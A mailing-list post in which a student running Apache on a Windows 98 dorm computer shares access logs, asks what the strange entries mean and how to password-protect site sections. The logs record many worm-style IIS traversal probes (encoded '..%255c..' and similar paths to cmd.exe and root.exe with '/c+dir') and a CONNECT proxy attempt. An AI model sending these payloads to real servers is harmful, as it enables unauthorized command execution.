> 207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 216.152.64.163 - - [27/Jan/2002:21:09:32 -0500] "CONNECT 216.152.64.23:7000 HTTP/1.0" 405 305
> 207.235.88.131 - - [27/Jan/2002:23:09:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
> 207.235.88.131 - - [27/Jan/2002:23:09:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
> 207.235.88.131 - - [27/Jan/2002:23:09:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.235.88.131 - - [27/Jan/2002:23:09:54 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
> 207.235.88.131 - - [27/Jan/2002:23:09:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.235.88.131 - - [27/Jan/2002:23:09:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.235.88.131 - - [27/Jan/2002:23:09:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
> 207.235.88.131 - - [27/Jan/2002:23:09:59 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
> 207.235.88.131 - - [27/Jan/2002:23:10:00 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.235.88.131 - - [27/Jan/2002:23:10:02 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.235.88.131 - - [27/Jan/2002:23:10:06 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.235.88.131 - - [27/Jan/2002:23:10:11 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
> 207.235.88.131 - - [27/Jan/2002:23:10:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.235.88.131 - - [27/Jan/2002:23:10:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
> 207.235.88.131 - - [27/Jan/2002:23:10:22 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.235.88.131 - - [27/Jan/2002:23:10:23 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
> 207.159.185.216 - - [28/Jan/2002:20:01:59 -0500] "GET / HTTP/1.1" 200 3908
> 207.159.185.216 - - [28/Jan/2002:20:01:59 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
> 207.159.185.216 - - [28/Jan/2002:20:02:05 -0500] "GET /pass.html HTTP/1.1" 200 541
> 207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /checkarhsccxxxx.html HTTP/1.1" 200 170
> 207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /scores.html HTTP/1.1" 200 3835
> 207.159.185.216 - - [28/Jan/2002:20:02:16 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 304 -
> 207.159.185.216 - - [28/Jan/2002:20:02:21 -0500] "GET /time/9.23.00.html HTTP/1.1" 200 1687
> 207.159.185.216 - - [28/Jan/2002:20:02:21 -0500] "GET /time/pic/run.gif HTTP/1.1" 404 296
>
>
> --End of acess log---
>
> --------------------------------------------------------------------
> mail2web - Check your email from the web at
> http://mail2web.com/ .
>
> _______________________________________________
> Wlug mailing list
> Wlug(a)mail.wlug.org
> http://mail.wlug.org/mailman/listinfo/wlug
>
Jan. 29, 2002
apache help
by bryon3245@netzero.com
I had some questions about apache. I am running apache on my dorm computer which is a win 98 and I started getting some strange log's.
Sorry about it being so long but the stuff that scares is near the bottom. Could you also help me make it so users have to enter a password and username to acess certain sections of the site.
Thanks everyone.
Here are the log's
---Start of acess long---
207.159.186.214 - - [21/Jan/2002:13:37:39 -0500] "GET / HTTP/1.1" 200 3848
207.159.186.214 - - [21/Jan/2002:13:37:39 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.186.214 - - [21/Jan/2002:13:37:55 -0500] "GET /westfield/index.html HTTP/1.1" 200 25
207.159.186.214 - - [21/Jan/2002:13:37:58 -0500] "GET /pass.html HTTP/1.1" 200 541
207.159.186.214 - - [21/Jan/2002:13:38:02 -0500] "GET /playlistnew.html HTTP/1.1" 200 113637
207.159.186.214 - - [21/Jan/2002:13:38:02 -0500] "GET /null HTTP/1.1" 404 284
205.188.209.137 - - [21/Jan/2002:16:55:03 -0500] "GET / HTTP/1.0" 200 3848
205.188.209.103 - - [21/Jan/2002:16:55:06 -0500] "GET /pic/coolrun.GIF HTTP/1.0" 200 35654
205.188.209.171 - - [21/Jan/2002:16:55:39 -0500] "GET /playlist.html HTTP/1.0" 200 21864
205.188.209.107 - - [21/Jan/2002:16:55:42 -0500] "GET /null HTTP/1.0" 404 272
205.188.209.171 - - [21/Jan/2002:16:56:20 -0500] "GET /dmb/ HTTP/1.0" 200 0
207.159.184.101 - - [21/Jan/2002:17:29:09 -0500] "GET / HTTP/1.1" 200 3848
207.159.184.101 - - [21/Jan/2002:17:29:09 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.190.154 - - [21/Jan/2002:17:48:47 -0500] "GET / HTTP/1.1" 200 3848
207.159.190.154 - - [21/Jan/2002:17:48:47 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.190.154 - - [21/Jan/2002:17:49:10 -0500] "GET /dmb/ HTTP/1.1" 200 0
207.159.190.154 - - [21/Jan/2002:17:52:37 -0500] "GET / HTTP/1.1" 304 -
207.159.190.154 - - [21/Jan/2002:17:52:44 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
207.159.185.198 - - [22/Jan/2002:12:04:24 -0500] "GET / HTTP/1.1" 200 4131
207.159.185.198 - - [22/Jan/2002:12:04:24 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.185.198 - - [22/Jan/2002:12:04:53 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
207.159.188.168 - - [22/Jan/2002:12:33:56 -0500] "GET / HTTP/1.1" 200 4131
207.159.188.168 - - [22/Jan/2002:12:33:57 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.188.168 - - [22/Jan/2002:12:34:23 -0500] "GET /playlist.html HTTP/1.1" 200 21864
207.159.188.168 - - [22/Jan/2002:12:34:23 -0500] "GET /null HTTP/1.1" 404 284
207.159.182.24 - - [22/Jan/2002:14:18:44 -0500] "GET / HTTP/1.1" 200 4131
207.159.182.24 - - [22/Jan/2002:14:18:47 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.182.24 - - [22/Jan/2002:14:19:38 -0500] "GET /null HTTP/1.1" 404 284
207.159.182.24 - - [22/Jan/2002:14:19:38 -0500] "GET /playlistnew.html HTTP/1.1" 200 113637
207.159.186.206 - - [23/Jan/2002:01:54:45 -0500] "GET / HTTP/1.1" 200 4309
207.159.186.206 - - [23/Jan/2002:01:54:48 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.185.221 - - [23/Jan/2002:10:07:37 -0500] "GET / HTTP/1.1" 200 4309
207.159.185.221 - - [23/Jan/2002:10:07:38 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
207.159.185.221 - - [23/Jan/2002:13:56:46 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 18044
207.12.170.187 - - [23/Jan/2002:16:04:08 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.12.170.187 - - [23/Jan/2002:16:04:09 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.12.170.187 - - [23/Jan/2002:16:04:09 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.12.170.187 - - [23/Jan/2002:16:04:10 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.12.170.187 - - [23/Jan/2002:16:04:10 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.12.170.187 - - [23/Jan/2002:16:04:11 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.12.170.187 - - [23/Jan/2002:16:04:12 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.12.170.187 - - [23/Jan/2002:16:04:13 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.12.170.187 - - [23/Jan/2002:16:04:14 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.12.170.187 - - [23/Jan/2002:16:04:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.12.170.187 - - [23/Jan/2002:16:04:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.12.170.187 - - [23/Jan/2002:16:04:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.12.170.187 - - [23/Jan/2002:16:04:20 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.12.170.187 - - [23/Jan/2002:16:04:20 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.12.170.187 - - [23/Jan/2002:16:04:21 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.12.170.187 - - [23/Jan/2002:16:04:22 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.79.223.201 - - [25/Jan/2002:00:04:32 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.79.223.201 - - [25/Jan/2002:00:04:33 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.79.223.201 - - [25/Jan/2002:00:04:34 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.79.223.201 - - [25/Jan/2002:00:04:38 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.79.223.201 - - [25/Jan/2002:00:04:38 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.79.223.201 - - [25/Jan/2002:00:04:39 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.79.223.201 - - [25/Jan/2002:00:04:39 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.79.223.201 - - [25/Jan/2002:00:04:40 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.79.223.201 - - [25/Jan/2002:00:04:44 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.79.223.201 - - [25/Jan/2002:00:04:44 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.79.223.201 - - [25/Jan/2002:00:04:45 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.79.223.201 - - [25/Jan/2002:00:04:45 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.79.223.201 - - [25/Jan/2002:00:04:46 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.79.223.201 - - [25/Jan/2002:00:04:46 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.79.223.201 - - [25/Jan/2002:00:04:47 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.79.223.201 - - [25/Jan/2002:00:04:48 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
172.136.154.122 - - [25/Jan/2002:07:03:39 -0500] "GET / HTTP/1.1" 200 3908
172.136.154.122 - - [25/Jan/2002:07:04:02 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
172.136.154.122 - - [25/Jan/2002:07:05:48 -0500] "GET /climb/climbpic.html HTTP/1.1" 200 1214
172.136.154.122 - - [25/Jan/2002:07:06:03 -0500] "GET /pic/climb-web/DiamondSunrise.jpg HTTP/1.1" 200 47405
172.136.154.122 - - [25/Jan/2002:07:06:14 -0500] "GET /pic/climb-web/ElMatadorJam.jpg HTTP/1.1" 200 44299
172.136.154.122 - - [25/Jan/2002:07:06:19 -0500] "GET /pic/climb-web/ElMatadorLead.jpg HTTP/1.1" 200 16384
172.136.154.122 - - [25/Jan/2002:07:06:53 -0500] "GET /pass.html HTTP/1.1" 200 541
207.69.105.152 - - [25/Jan/2002:08:43:41 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.69.105.152 - - [25/Jan/2002:08:43:42 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.69.105.152 - - [25/Jan/2002:08:43:44 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.69.105.152 - - [25/Jan/2002:08:43:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.69.105.152 - - [25/Jan/2002:08:43:45 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.69.105.152 - - [25/Jan/2002:08:43:46 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.69.105.152 - - [25/Jan/2002:08:43:46 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.69.105.152 - - [25/Jan/2002:08:43:47 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.69.105.152 - - [25/Jan/2002:08:43:47 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.69.105.152 - - [25/Jan/2002:08:43:48 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.69.105.152 - - [25/Jan/2002:08:43:49 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.69.105.152 - - [25/Jan/2002:08:43:53 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.69.105.152 - - [25/Jan/2002:08:43:53 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.69.105.152 - - [25/Jan/2002:08:43:54 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
172.150.104.186 - - [25/Jan/2002:17:00:57 -0500] "GET / HTTP/1.1" 200 3908
172.150.104.186 - - [25/Jan/2002:17:01:00 -0500] "GET /pic/coolrun.GIF HTTP/1.1" 200 35654
172.150.104.186 - - [25/Jan/2002:17:01:26 -0500] "GET /westfield/index.html HTTP/1.1" 200 230
172.150.104.186 - - [25/Jan/2002:17:01:36 -0500] "GET /pass.html HTTP/1.1" 200 541
207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.127.214.82 - - [25/Jan/2002:17:53:17 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.127.214.82 - - [25/Jan/2002:17:53:18 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.127.214.82 - - [25/Jan/2002:17:53:19 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.191.114.210 - - [26/Jan/2002:01:41:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.191.114.210 - - [26/Jan/2002:01:41:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.191.114.210 - - [26/Jan/2002:01:41:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.191.114.210 - - [26/Jan/2002:01:42:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.191.114.210 - - [26/Jan/2002:01:42:02 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.191.114.210 - - [26/Jan/2002:01:42:08 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
63.48.237.131 - - [26/Jan/2002:04:24:43 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 8192
63.48.237.131 - - [26/Jan/2002:04:26:05 -0500] "GET /ebay/dict.jpg HTTP/1.1" 200 18044
207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.224.107.109 - - [26/Jan/2002:09:32:51 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.224.107.109 - - [26/Jan/2002:09:32:52 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.224.107.109 - - [26/Jan/2002:09:32:56 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.224.107.109 - - [26/Jan/2002:09:32:59 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.224.107.109 - - [26/Jan/2002:09:33:00 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.65.157.54 - - [27/Jan/2002:20:30:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.65.157.54 - - [27/Jan/2002:20:30:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.65.157.54 - - [27/Jan/2002:20:30:14 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 339
207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.65.157.54 - - [27/Jan/2002:20:30:15 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
207.65.157.54 - - [27/Jan/2002:20:30:16 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.65.157.54 - - [27/Jan/2002:20:30:17 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
216.152.64.163 - - [27/Jan/2002:21:09:32 -0500] "CONNECT 216.152.64.23:7000 HTTP/1.0" 405 305
207.235.88.131 - - [27/Jan/2002:23:09:50 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284
207.235.88.131 - - [27/Jan/2002:23:09:51 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282
207.235.88.131 - - [27/Jan/2002:23:09:53 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.235.88.131 - - [27/Jan/2002:23:09:54 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
207.235.88.131 - - [27/Jan/2002:23:09:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
207.235.88.131 - - [27/Jan/2002:23:09:57 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
207.235.88.131 - - [27/Jan/2002:23:09:58 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 323
